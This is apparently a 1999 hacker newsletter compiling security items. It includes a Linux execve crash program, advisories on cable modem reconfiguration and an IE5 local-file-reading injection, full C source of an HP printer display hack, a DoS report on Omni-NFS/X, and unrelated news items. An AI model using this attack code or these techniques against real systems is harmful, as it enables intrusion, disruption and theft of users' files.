~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://packetstorm.securify.com From: ben@VALINUX.COM Subject: execve bug linux-2.2.12 While doing some debugging, I discovered a really nasty stack smash bug in linux-2.2.12. The I haven't checked previous versions of the 2.2 kernel but bug appears to be fixed in linux-2.2.13pre17. If I am reading this correctly, the implications of this bug could be very dire. It may be possible to easily obtain root privilege on any box running this kernel. Basically the problem is that the execve system call checks that argv is a valid pointer but it doesn't check that all of the pointers in argv array are valid pointers. If you pass bad pointers into the execve system call you can corrupt the processes stack before it returns to user space. Then when the kernel hands off the process to the elf loader code and which begins to setup the processes it can be made to execute some malicious code in place of the program's main function. This is particularly scary because all of this occurs BEFORE the program begins executing its main function and AFTER the program returns to user space with privilege. Therefore no matter how well audited the program may be it can be used as to gain privilege. The thing that tipped me off to the problem was that a program that I exec'd was getting killed with SIGSEGV in __libc_start_main before my main function began running. -ben Per popular demand here is some more information on the bug I've been observing. I'm sorry. I wish I had thought to include this in my original post: Here is one ltrace fragment where my program only corrupts one of the parameters: [pid 578] execv("/bin/grep", 0x7ffffcdc <unfinished ...> [pid 578] __libc_start_main(0x0804a4e0, 200, 0x7fffb3a4, 0x08048bf4, 0x080516dc <unfinished ...> [pid 578] --- SIGSEGV (Segmentation fault) --- [pid 578] +++ killed by SIGSEGV +++ --- SIGCHLD (Child exited) --- Here is some information from gdb: (gdb) core-file /tmp/core Core was generated by Program terminated with signal 11, Segmentation fault. Reading symbols from /lib/libc.so.6...done. Reading symbols from /lib/ld-linux.so.2...done. #0 0x2aae60f6 in getenv (name=0x2aba8562 "LLOC_TRIM_THRESHOLD_") at ../sysdeps/generic/getenv.c:88 ../sysdeps/generic/getenv.c:88: No such file or directory. (gdb) bt #0 0x2aae60f6 in getenv (name=0x2aba8562 "LLOC_TRIM_THRESHOLD_") at ../sysdeps/generic/getenv.c:88 #1 0x2aae689b in __secure_getenv (name=0x2aba8560 "MALLOC_TRIM_THRESHOLD_") at secure-getenv.c:29 #2 0x2ab1e2e0 in ptmalloc_init () at malloc.c:1689 #3 0x2aade211 in __libc_preinit (argc=200, argv=0x7fffb3a4, envp=0x7fffb6c8) at set-init.c:26 #4 0x2aade030 in __libc_start_main (main=0x804a4e0 <strcpy+5500>, argc=200, argv=0x7fffb3a4, init=0x8048bf4, fini=0x80516dc <strcpy+34680>, rtld_fini=0x2aab5ad4 <_dl_fini>, stack_end=0x7fffb39c) at ../sysdeps/generic/libc-start.c:68 (gdb) This was just one run. There were other runs where more interesting things happened. There was one in particular where the pointer to init was corrupted but I haven't been able to reproduce that one yet. I put the source code for the program I was debugging at the time when I stumbled into this at: "ftp://ftp.bastille-linux.org/bastille/broken-fuzz.c.gz". Note: this is not a working program!!! Do not take this as a release. I have since fixed many bugs in it. I coded it up and was in the process of making it work for the first time when I stumbled across this problem. Its its current form its only purpose is to demonstrate the problem that I saw. To trigger the problem simply run the program with the -ba option and the name of your favorite exectuable. e.g. "./fuzz -ba grep" -ben To: BugTraq Subject: Re: execve bug linux-2.2.12 Date: Fri Oct 15 1999 19:20:14 Author: visi0n Whoa, I think the kernel 2.0.38 has the same bug, and one more, in the count() function to check how many argv's the bin have, he dont check for max number of argv's. This is worse than the bug found in 2.2.12 execve(). To: BugTraq Subject: Re: execve bug linux-2.2.12 Date: Sat Oct 16 1999 07:22:02 Author: Alan Cox > Basically the problem is that the execve system call checks that argv > is a valid pointer but it doesn't check that all of the pointers in > argv array are valid pointers. If you pass bad pointers into the This is incorrect. To start with - it builds the argv pointer array itself. The passed array is simply used to get a list of strings and to build them on the stack of the target process. The argv and envp is then built by the ELF loader walking these tables in order to generate the argv and envp arrays that the SYS5 ABI expects to be passed (saner ABI's the user space start up builds argc/argv). > execve system call you can corrupt the processes stack before it > returns to user space. Then when the kernel hands off the process to I don't think you can. The built ELF stack looks roughly like [Environment] - null terminated string data [Arguments] - null terminated string data [Elf gloop] [envp] [argv] [argc] -> You are here on entry, so the stack is fine. > The thing that tipped me off to the problem was that a program that I > exec'd was getting killed with SIGSEGV in __libc_start_main before my > main function began running. I would certainly be interested in an example that caused this. That there could be a bug in the kernel or glibc exec building I can believe. Your diagnosis of the cause however is dubious. Alan To: BugTraq Subject: Re: execve bug linux-2.2.12 Date: Sat Oct 16 1999 14:13:19 Author: security@xirr.com Caveat: I am running linux-2.2.12ow6 which contains many security fixes, yet I believe my comments are still valid. Also I am not a kernel guru. > Basically the problem is that the execve system call > checks that argv is a valid pointer but it doesn't check > that all of the pointers in argv array are valid pointers. The kernel copies each argv[i] into a contiguous chunk of the (soon to be) stack. Thus it must dereference each argv[i]. Check out linux/fs/exec.c line 261 for an almost explicit dereference of argv[i] (memcpy(str,argv+i) except kernel to user space version). This is confirmed by a small test program: #include "nolibc.h" main(int argc, char** argv,char **envp) { int i; char buf[32]; argv[1]=2; i=execve("/bin/sh",argv,envp); /* we should never reach this point, but print out errno in hexadecimal */ i=htonl(i); i=itoh(&i,buf); buf[i]='\n'; write(1,buf,i+1); } This program does not run /bin/sh but istead prints out the message 0000000e representing errno=14, EFAULT. This means the kernel got a segfault while copying the argv[i]'s to the stack, and thus failed the syscall. This program is linked with 'gcc -O -fno-builtin -nostdlib test.c' nolibc.h is ugly but available by request under GPL. It defines ntohl,itoh,write,execve, and _start. Note execve, htonl, itoh, and write are macros. Execve/write are direct system calls. (itoh converts 4 bytes to 8byte hex representation and returns 8, htonl byte swaps so the bytes come out in the right order). > The thing that tipped me off to the problem was that a > program that I exec'd was getting killed with SIGSEGV > in __libc_start_main before my > main function began running. I'm not really sure if this is a widespread problem, but ANYTIME libc gets hosed (malloc(-1) for example) gdb reports the problem occuring in a function called from __libc_start_main and does not ever mention main. I'll study this a wee bit more, since the references I'm using for the startup state don't seem to jive with my experience. (Namely I never see an array of pointers being setup in the docs, and my programs definately do not do so, yet they function and dereference argv as if it were an array of pointers). Another remark: If I misunderstood the bug (like argv[1]=2 obviously is not valid, and is not what you meant) please let me know. Author: Matt Chapman On Sat, Oct 16, 1999 at 02:22:02PM +0100, Alan Cox wrote: > > I would certainly be interested in an example that caused this. #include #include #define BADPTR (char *)0x10 /* for example */ int main(int argc, char **argv, char **envp) { char *args[7]; int i; args[0] = "su"; for (i = 1; i < 6; i++) { args[i] = BADPTR; } args[6] = NULL; execve("/bin/su", args, envp); printf("%s\n", strerror(errno)); return 1; } This program (on my system at least 5 bad arguments are needed) reproducibly dies with SIGSEGV on 2.2.12. A similarly configured system with kernel 2.0.36 correctly reports EFAULT. This would not normally be a problem, however... the above program will not dump core for an ordinary user, only root, which makes me believe that the fault occurs after the process has gained the root euid from /bin/su. A gdb trace suggests the usual heap corruption in glibc, which does not seem to be related to the arguments passed to execve (as long as they are bad), so I doubt this is exploitable. However it is most likely a bug somewhere. Matt -- Matthew "Austin" Chapman SysAdmin, Developer, Samba Team Member @HWA 72.0 Finjan exploit alert ~~~~~~~~~~~~~~~~~~~~ http://packetstorm.securify.com Finjan Software, Inc. Malicious Code Exploit Alert Finjan customers and partners, There is a recent Trojan executable you should be aware of called WinNT.Infis. Through Finjan's proactive "sandbox" technology, executable files such as the WinNT.Infis are monitored and blocked on the first attack. By watching for violations of security policies, Finjan's SurfinShield Corporate protects desktop and network computers from attacks by this Trojan executable, as well as new variants of this malicious program, without requiring users to download any software patch or anti-virus pattern update. WinNT.Infis is yet another example of Trojan executables that are appearing more frequently. Please take proper precautions to educate and protect your corporation and employees. --------------------------------------------------------------- WinNT.Infis Trojan Executable --------------------------------------------------------------- OVERVIEW WinNT.Infis is an executable file with .EXE extension that installs itself as a native Windows NT system driver. It is the first known malicious program to install and run in Kernel mode under Windows NT. That is, WinNT.Infis runs in the most sensitive part of the Windows NT operating system. There has been speculation about the creation of a Windows NT driver attack, but most experts believed that such an attack was at least one or two years in the future. WinNT.Infis has made theory into reality much sooner than expected. WinNT.Infis Trojan is capable of infecting any executable files (program) on the fly from Kernel mode. TECHNICAL DESCRIPTION Infis is a 32-bit Windows executable file that infects other Windows executables. When the Trojan is executed, it creates the HKLM\SYSTEM\CurrentControlSet\Services\inf entry in the Windows NT registry and creates the system file INF.SYS in the \WINNT\SYSTEM32\DRIVERS directory. The INF.SYS file is a native Windows NT driver and is 4608 bytes. When the system is rebooted the altered driver (INF.SYS) is loaded automatically. This way the Trojan will be able to replicate to accessed executable files on the fly. The Trojan replicates to Windows executable applications that have .EXE extensions. The Trojan does not infect the CMD.EXE and is unable to infect read-only files. However, the Trojan has to be executed by an Administrator equivalent user. Without such a right the code is unable to replicate because, despite running in the kernel, it does not have a User mode replication component. HOW TO PROTECT YOURSELF Finjan's SurfinShield Corporate (http://www.finjan.com/products_home.cfm) will protect users from ALL variants of this Trojan as well as new Trojan executables through its proactive run-time monitoring technology that "sandboxes" executables saved on PCs and blocks any executable that violates a security policy. Updated pattern databases from anti-virus vendors will block this version of WinNT.Infis.exe. ADDITIONAL INFORMATION InfoWorld story (Oct. 8, 1999): http://www.infoworld.com/cgi-bin/displayStory.pl?99108.enntvirus.htm ---------------------------------------------------------------------- PRIVACY AND UNSUBSCRIBE NOTICE Finjan Software respects your right to online privacy. If you do not wish to receive news or alert e-mails from us, simply reply to this e-mail at: finjan@usmail.finjan.com and type "unsubscribe" in the "subject" field. @HWA 73.0 Hybrid network cablemodems ~~~~~~~~~~~~~~~~~~~~~~~~~~ http://packetstorm.securify.com KSR[T] Security Advisories http://www.ksrt.org Contact Account: ksrt@ksrt.org Advisory Subscription: Send an empty message to: ksrt-advisories-subscribe@ksrt.org ---- KSR[T] Advisory #012 Date: Oct. 6 1999 ID #: hybr-hsmp-012 Affected Program: Hybrid Network's Cable Modems Author: David Goldsmith Summary: Remote attackers can anonymously reconfigure any Hybrid Network's cable modem that is running HSMP. This can be used to steal information and login/password pairs from cable modem users. Problem Description: Hybrid Network's cable modems can be configured via a UDP based protocol called HSMP. This protocol does not require any authentication to perform configuration requests. Since UDP is easily spoofed, configuration changes can made anonymously. Compromise: There are a plethora of denial of services attacks involving bad configuration settings (ethernet interfaces set to non-routable IP addresses, et al). HSMP can also be used to configure the DNS servers used by cable modem users, allowing attackers to redirect cable modem subscribers to a trojan site. More complex and theoretical attacks could involve the running of actual code through the debugging interface. This might allow remote attackers to deploy ethernet sniffers on the cable modem. Notes: KSR[T] found this vulnerability in parallel with Paul S. Cosis and the l0pht. We would like to thank them for their input to this advisory. Patch/Fix: Cable providers should block out HSMP traffic (7777/udp) on their firewalls. Links: KSR[T] had initially written a demonstration HSMP client which is located at: http://www.ksrt.org/ksrt-hsmp.tar.gz There is also another HSMP client located at: http://www.larsshack.org/sw/ccm/ l0pht modified the above client and added the ability to spoof the source address, allowing for the anonymous reconfiguration of Hybrid cable modems). Their client is located at: http://c0re.l0pht.com/~sili/ccm-spoof.tar.gz @HWA 74.0 HP Printer display hack (source code) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www3.l0pht.com/~sili/hp.c /* HP Printer Hack 12/8/97 sili@l0pht.com Compile with -lsocket -lnsl on solaris. Should compile fine on *BSD & linux. */ #include #include #include #include #include #define PORT 9100 int main (int argc, char *argv[]) { int sockfd,len,bytes_sent; /* Sock FD */ struct hostent *host; /* info from gethostbyname */ struct sockaddr_in dest_addr; /* Host Address */ char line[100]; if (argc !=3) { printf("HP Display Hack\n--sili@l0pht.com 12/8/97\n\n%s printer \"message\"\n",argv[0]); printf("\tMessage can be up to 16 characters long (44 on 5si's)\n"); exit(1); } if ( (host=gethostbyname(argv[1])) == NULL) { perror("gethostbyname"); exit(1); } printf ("HP Display hack -- sili@l0pht.com\n"); printf ("Hostname: %s\n", argv[1]); printf ("Message: %s\n",argv[2]); /* Prepare dest_addr */ dest_addr.sin_family= host->h_addrtype; /* AF_INET from gethostbyname */ dest_addr.sin_port= htons(PORT) ; /* PORT defined above */ /* Prepare dest_addr */ bcopy(host->h_addr, (char *) &dest_addr.sin_addr, host->h_length); bzero(&(dest_addr.sin_zero), 8); /* Take care of sin_zero ??? */ /* Get socket */ /* printf ("Grabbing socket....\n"); */ if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0) { perror("socket"); exit(1); } /* Connect !*/ printf ("Connecting....\n"); if (connect(sockfd, (struct sockaddr *)&dest_addr,sizeof(dest_addr)) == -1){ perror("connect"); exit(1);} /* Preparing JPL Command */ strcpy(line,"\033%-12345X@PJL RDYMSG DISPLAY = \""); strncat(line,argv[2],44); strcat(line,"\"\r\n\033%-12345X\r\n"); /* Sending data! */ /* printf ("Sending Data...%d\n",strlen(line));*/ /* printf ("Line: %s\n",line); */ bytes_sent=send(sockfd,line,strlen(line),0); printf("Sent %d bytes\n",bytes_sent); close(sockfd); } @HWA 75.0 Omni-NFS/X Enterprise version 6.1 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://packetstorm.securify.com Faulty software --------------- Omni-NFS/X Enterprise version 6.1 Product --------- Omni-NFS/X Enterprise is a X, NFS server solution for win32 systems. It is written by XLink Technology ( http://www.xlink.com ) . Vulnerability ------------- The nfs daemon ( nfsd.exe ) used by Omni-NFS/X will jump to 100% cpu usage if you scan it using nmap with ether the -O (OS detect ) or the -sS ( TCP SYN (half open) ) . Example : (zorkeres@rh-mindlab)(Omni-X)(06/10/99) (1007) $ nmap -O -p 111 slacky Starting nmap V. 2.3BETA5 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/) Interesting ports on slacky (192.168.1.2): Port State Protocol Service 111 open tcp sunrpc TCP Sequence Prediction: Class=trivial time dependency Difficulty=2 (Trivial joke) Remote operating system guess: Windows NT4 / Win95 / Win98 Nmap run completed -- 1 IP address (1 host up) scanned in 1 second (zorkeres@rh-mindlab)(Omni-X)(06/10/99) (1008) $ This was tested on Microsoft Windows NT 4.0 Workstation with SP5 . I'm preaty sure all their NFS solutions are affected by this. ------------------------------------------------ Sacha Faust sfaust@isi-mtl.com "He who despairs of the human condition is a coward, but he who has hope for it is a fool. " - Albert Camus Faulty software --------------- Omni-NFS/X Enterprise version 6.1 Product --------- Omni-NFS/X Enterprise is a X, NFS server solution for win32 systems. It is written by XLink Technology ( http://www.xlink.com ) . Vulnerability ------------- The nfs daemon ( nfsd.exe ) used by Omni-NFS/X will jump to 100% cpu usage if you scan it using nmap with ether the -O (OS detect ) or the -sS ( TCP SYN (half open) ) . Example : (zorkeres@rh-mindlab)(Omni-X)(06/10/99) (1007) $ nmap -O -p 111 slacky Starting nmap V. 2.3BETA5 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/) Interesting ports on slacky (192.168.1.2): Port State Protocol Service 111 open tcp sunrpc TCP Sequence Prediction: Class=trivial time dependency Difficulty=2 (Trivial joke) Remote operating system guess: Windows NT4 / Win95 / Win98 Nmap run completed -- 1 IP address (1 host up) scanned in 1 second (zorkeres@rh-mindlab)(Omni-X)(06/10/99) (1008) $ This was tested on Microsoft Windows NT 4.0 Workstation with SP5 . I'm preaty sure all their NFS solutions are affected by this. ------------------------------------------------ Sacha Faust sfaust@isi-mtl.com "He who despairs of the human condition is a coward, but he who has hope for it is a fool. " - Albert Camus @HWA 76.0 More IE5 vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~ IE 5.0 security vulnerability - reading local (and from any domain, probably window spoofing is possible) files using IFRAME and document.execCommand Disclaimer: The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this program. Georgi Guninski, bears NO responsibility for content or misuse of this program or any derivatives thereof. Description: Internet Explorer 5.0 under Windows 95 and WinNT 4.0 (suppose Win98 is vulnerable) allows reading local files, text and HTML files from any domain and probably window spoofing (have not tested window spoofing but believe it is possible) It is also possible in some cases to read files behind fiewall. Details: The problem is the combination of IFRAME and document.execCommand. Normally, you cannot use execCommand on an IFRAME from another domain. But if you do: "IFRAME.focus(); document.execCommand" then command will be executed in the IFRAME (some commands do not work in this way, but some do and that is enough). So, we create an IFRAME with SRC="file://c:/test.txt" and inject JavaScript code in it. When the JavaScript code is executed, it is executed in the security context of the IFRAME - the "file:" protocol. The injection is done using the "InsertParagraph" command (guess other commands will do) which sets the ID of the paragraph. But if you place a " in the ID, then a STYLE tag may be inserted also. The JavaScript code is injected using the STYLE tag: STYLE="left:expression(eval(JSCode))" This vulnerability may be exploited using HTML email message or a newsgroup posting. The code is: ---------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------- Workaround: Disable Active Scripting Demonstration is available at http://www.nat.bg/~joro/execcommand.html Regards, Georgi Guninski http://www.nat.bg/~joro -=- The following is a Security Bulletin from the Microsoft Product Security Notification Service. Please do not reply to this message, as it was sent from an unattended mailbox. ******************************** Microsoft Security Bulletin (MS99-040) -------------------------------------- Patch Available for "Download Behavior" Vulnerability Originally Posted: September 28, 1999 Updated: October 08, 1999 Summary ======= On September 28, 1999, Microsoft released the original version of this bulletin, in order to provide a workaround for a security vulnerability in Microsoft(r) Internet Explorer 5 that could allow a malicious web site operator to read files on the computer of a person who visited the site. Microsoft has completed a patch that completely eliminates the vulnerability, and has re-released this bulletin in order to advise customers of its availability. Frequently asked questions regarding this vulnerability can be found at http://www.microsoft.com/security/bulletins/MS99-040faq.asp. Issue ===== IE 5 includes a feature called "download behavior" that allows web page authors to download files for use in client-side script. By design, a web site should only be able to download files that reside in its domain; this prevents client-side code from exposing files on the user's machine or local intranet to the web site. However, a server-side redirect can be used to bypass this restriction, thereby enabling a malicious web site operator to read files on the user's machine or the user's local intranet. This vulnerability would chiefly affect workstations that are connected to the Internet. Affected Software Versions ========================== - Microsoft Internet Explorer 5 Patch Availability ================== The patch is available for download at either of the following locations - http://windowsupdate.microsoft.com - http://www.microsoft.com/msdownload/iebuild/dlbhav/en/dlbhav.htm More Information ================ Please see the following references for more information related to this issue. - Microsoft Security Bulletin MS99-040: Frequently Asked Questions, http://www.microsoft.com/security/bulletins/ms99-040faq.asp. - Microsoft Knowledge Base (KB) article Q242542, "Download Behavior" Vulnerability in Internet Explorer 5, http://support.microsoft.com/support/kb/articles/Q242/5/42.asp. (Note: It may take 24 hours from the original posting of this bulletin for this KB article to be visible.) - Microsoft Security Advisor web site, http://www.microsoft.com/security/default.asp. Obtaining Support on this Issue =============================== Information on contacting Microsoft Technical Support is available at http://support.microsoft.com/support/contact/default.asp. Acknowledgments =============== Microsoft acknowledges Georgi Guninski for bringing this issue to our attention. Revisions ========= - September 28, 1999: Bulletin Created. - October 08, 1999: Bulletin updated to announce availability of patch. ----------------------------------------------------------------------- THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY. (c) 1999 Microsoft Corporation. All rights reserved. Terms of Use. ******************************************************************* You have received this e-mail bulletin as a result of your registration to the Microsoft Product Security Notification Service. You may unsubscribe from this e-mail notification service at any time by sending an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM The subject line and message body are not used in processing the request, and can be anything you like. For more information on the Microsoft Security Notification Service please visit http://www.microsoft.com/security/services/bulletin.asp. For security-related information about Microsoft products, please visit the Microsoft Security Advisor web site at http://www.microsoft.com/security. The following is a Security Bulletin from the Microsoft Product Security Notification Service. Please do not reply to this message, as it was sent from an unattended mailbox. ******************************** Microsoft Security Bulletin (MS99-040) -------------------------------------- Patch Available for "Download Behavior" Vulnerability Originally Posted: September 28, 1999 Updated: October 08, 1999 Summary ======= On September 28, 1999, Microsoft released the original version of this bulletin, in order to provide a workaround for a security vulnerability in Microsoft(r) Internet Explorer 5 that could allow a malicious web site operator to read files on the computer of a person who visited the site. Microsoft has completed a patch that completely eliminates the vulnerability, and has re-released this bulletin in order to advise customers of its availability. Frequently asked questions regarding this vulnerability can be found at http://www.microsoft.com/security/bulletins/MS99-040faq.asp. Issue ===== IE 5 includes a feature called "download behavior" that allows web page authors to download files for use in client-side script. By design, a web site should only be able to download files that reside in its domain; this prevents client-side code from exposing files on the user's machine or local intranet to the web site. However, a server-side redirect can be used to bypass this restriction, thereby enabling a malicious web site operator to read files on the user's machine or the user's local intranet. This vulnerability would chiefly affect workstations that are connected to the Internet. Affected Software Versions ========================== - Microsoft Internet Explorer 5 Patch Availability ================== The patch is available for download at either of the following locations - http://windowsupdate.microsoft.com - http://www.microsoft.com/msdownload/iebuild/dlbhav/en/dlbhav.htm More Information ================ Please see the following references for more information related to this issue. - Microsoft Security Bulletin MS99-040: Frequently Asked Questions, http://www.microsoft.com/security/bulletins/ms99-040faq.asp. - Microsoft Knowledge Base (KB) article Q242542, "Download Behavior" Vulnerability in Internet Explorer 5, http://support.microsoft.com/support/kb/articles/Q242/5/42.asp. (Note: It may take 24 hours from the original posting of this bulletin for this KB article to be visible.) - Microsoft Security Advisor web site, http://www.microsoft.com/security/default.asp. Obtaining Support on this Issue =============================== Information on contacting Microsoft Technical Support is available at http://support.microsoft.com/support/contact/default.asp. Acknowledgments =============== Microsoft acknowledges Georgi Guninski for bringing this issue to our attention. Revisions ========= - September 28, 1999: Bulletin Created. - October 08, 1999: Bulletin updated to announce availability of patch. ----------------------------------------------------------------------- THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY. (c) 1999 Microsoft Corporation. All rights reserved. Terms of Use. ******************************************************************* You have received this e-mail bulletin as a result of your registration to the Microsoft Product Security Notification Service. You may unsubscribe from this e-mail notification service at any time by sending an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM The subject line and message body are not used in processing the request, and can be anything you like. For more information on the Microsoft Security Notification Service please visit http://www.microsoft.com/security/services/bulletin.asp. For security-related information about Microsoft products, please visit the Microsoft Security Advisor web site at http://www.microsoft.com/security. @HWA 77.0 Gov-boi dies in a car crash? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.hack.co.za Well known and liked on irc (and in #ninjachat) aka Insanity/gov-boi sadly died in a car crash this weekend...he ran the site www.hack.co.za which was popular for its '0day' exploit releases This is a hot issue I've been fed so much bullshit regarding this story that its not funny. if its true, our condolences The site reads; I regretfully announce the sad loss of the owner of www.hack.co.za due to an unfortunate innocedent. He was envolved in a car accident which claimed his life about 2 hours ago. His loss is a tragedy and his security expertise will be greated missed by all who knew him. He was known on irc as gov-boi or hotmetal. On a personal note.. I would like to pass on our personal condolences to the members of his family.. ++Matthew Pieterson. matthew@hack.co.za The above was written before I found out it was a hoax and even made it onto Hackernews.com (sorry guys) I was fed false info, I wasn't the only one that fell for this macabre joke, deepquest and mosthated also mailed hackernews with the story.... live and learn. Now the punchline, this was all an elaborate hoax played out by gov-boi who is very much alive. The idea was to be a 'ghost hacker' for halloween so he took it one step further and faked his death....hope this doesn't taunt fate =)s @HWA 78.0 "Secret" Nokia phone codes ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the "Its here coz I have a nokia dept". =) - Ed If anyone has codes for the 2190e or 51xxx series send em in!!! i'd be much appreciative some of these codes work for my phone although are designated for others. - Ed Source: http://www.nokiaphonefunsite.freeserve.co.uk/secretcodes.html To find out the IMEI number of your phone press: * # 06 # To find software version information press: * # 0000 # or * # 9999 # To find out about your phone's Warranty, press: *#92702689# or *#92772689# s In this menu there are serveral options: IMEI (International Mobile Equipment Identification) Made MM/YY (date of production of the phone mm/yy) Purchasing Date (You can edit the Purchase Date here ; you cannot undo the changes once edited) Repaired (date of repair, if there was one) Transfer user data To activate EFR after phone reboot: *3370# To deactivate EFR after phone reboot: #3370# To activate HFR after phone reboot: *4720# To deactivate HFR after phone reboot: #4720# Note: EFR (Enhanced Full Rate) and HFR (Half Full Rate) are only available on Orange and One2One Precept customers. Both increase call quality at the expense of battery life. EFR does this more so than HFR. If your are with Orange, it is likely that EFR is already activated. I haven't tried these, so I'm not sure if they work or not. If you know any codes for Nokia phones yourself, please don't hesitate to let me know. @HWA 79.0 Realnetworks snooping? ~~~~~~~~~~~~~~~~~~~~~ From Dragos Ruiu RealNetworks has been surreptitiously gathering behavioral data from their jukeboxes. Seems significant to me. What -does- doubleclick do? --dr http://www.wired.com/news/reuters/0,1349,32244,00.html Real Snooping by RealNetworks Reuters 8:35 a.m. 1.Nov.1999 PST RealNetwork's RealJukebox software monitors user listening habits and other activities, then sends the information and the user's identity to the company, The New York Times said. A security expert intercepted and examined information generated from the program, and company officials acknowledged that RealJukebox gathers information on what users are playing and recording, the Times said. RealJukebox is used to play compact discs on computers and can copy music to a user's hard drive and download music from the Internet. Dave Richards, RealNetworks' vice president for consumer products, told the Times the company gathered the information to customize service for individual users. He and other company officials said the practice did not violate consumer privacy because the data was not stored by the company or released to other companies. But privacy advocates and security experts agreed that it was a violation of the privacy of the 13.5 million registered users of RealJukebox, the Times said, particularly because RealNetworks has not informed consumers they are being identified and monitored. Richard Smith, an independent security consultant, said RealNetworks tracks the numbers of songs stored on a user's hard drive, the kind of file formats in which the songs are stored, the user's preferred genre of music, and the type of portable music player, if any, the user has connected to the computer. In addition, a personal serial number known as a globally unique identifier, or GUID, is also sent to RealNetworks, the paper said. The fact that RealNetworks gathers the information is not mentioned in the privacy policy posted on its Web site, the Times said, or the licensing agreement users must approve when installing RealJukebox. Copyright 1999 Reuters Limited. @HWA 80.0 Copying DVD's? DVD Encryption broken ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ DVD Piracy: It Can Be Done by Andy Patrizio Its 1:20 p.m. 1.Nov.1999 PST The worst fear of movie studios has been realized: DVD movie encryption has been broken. A utility called DeCSS is currently floating around on the Net that will read a DVD movie disc and save the file on a hard disk, minus the encryption. All that’s required is a DVD-ROM drive -- since CD-ROM drives can’t read the 4.7GB DVD movie discs -- and a lot of disc space. The faster the CPU, the faster it will process the file. It takes around 10 minutes to process a .VOB file on a 500MHz Pentium III. The hack opens up illicit online trading of DVD movies, although minus DVD-ROM's interactive elements and outstanding audio/visual quality. The utility, written by two European programmers requesting anonymity, uses DVD playback code found in software-based DVD playback utilities, like WinDVD, ATI DVD from ATI Technologies, and XingDVD. Every player has a DVD copy protection decoder for playback, just like the hardware decoder in DVD players from Toshiba, Sony, and other consumer electronics devices. One programmer who examined DeCSS said the utility emulates that same playback code. But instead of displaying the video and audio to screen, it simply saves it back to the disk without encryption, since there is no encryption in playback. "The bottom line is, if you have a decoder, it has to execute somewhere. And that's always been the weak link, where you can get at the encrypted material," said David Moskowitz, president of Productivity Solutions, from King of Prussia, Pennsylvania. Getting the decryption code, as it turns out, is relatively easy. Using an in-circuit emulator -- a device used to monitor hardware activity -- Moskowitz was able to watch exactly what the DVD hardware does in decrypting the movie on his PC. "With that information, it's no big deal to create the [cracking] application," he said. One programmer who had a peripheral involvement in DeCSS development thinks piracy from this utility is a non-issue. "There have been DVD ripping tools available for months," said Derek Fawcus, a programmer in England. "Among the things you can find are explicit instructions and software for making VCD copies of DVDs. DeCSS is simply the latest in a line of methods of doing this." Some of the DVD decoder assembler code was released on the Internet, and Fawcus rewrote it in C code. That code was later used in DeCSS. Once decrypted, the DVD movie files, which have a .VOB extension, are too big to fit on a CD-ROM. Most .VOB video files are 1 GB in size, and a movie will be in three or four files. But there are many DVD conversion utilities floating around on DVD ripping sites, like DVDigest. It has conversion tools, like DVD2MPG and VOBSplit, which can be used to convert a DVD movie into VCD format, which can fit on a CD-ROM disc. There are even sites dedicated to converting DVDs to VCD format. This means losing the interactivity of DVD-ROM and its tremendous sound and video quality, but it also means VCDs can be played on CD-ROM drives. It also makes it easier to trade the movie online. Movie piracy has been a growing problem on the Internet, with films traded in MPEG and AVI format via Web sites and private file transfer sites. Movies in MPEG format are around 600 MB in size. DVD supporters are not thrilled by the development. "It was like pulling teeth to get the major studios to all commit to standard DVD in the first place," said Jeff McNeil, webmaster of The Big Picture, a home theater enthusiast site. "I consider this a disturbing development and only hope that it doesn't curtail studio commitment to DVD as we know it today." @HWA 81.0 Elite irc falls ~~~~~~~~~~~~~~~ ----- Original Message ----- From: Goblin To: Sent: Friday, October 29, 1999 6:56 AM Subject: DoS attack for ircd's by oversized PTR record (Read, 1st - 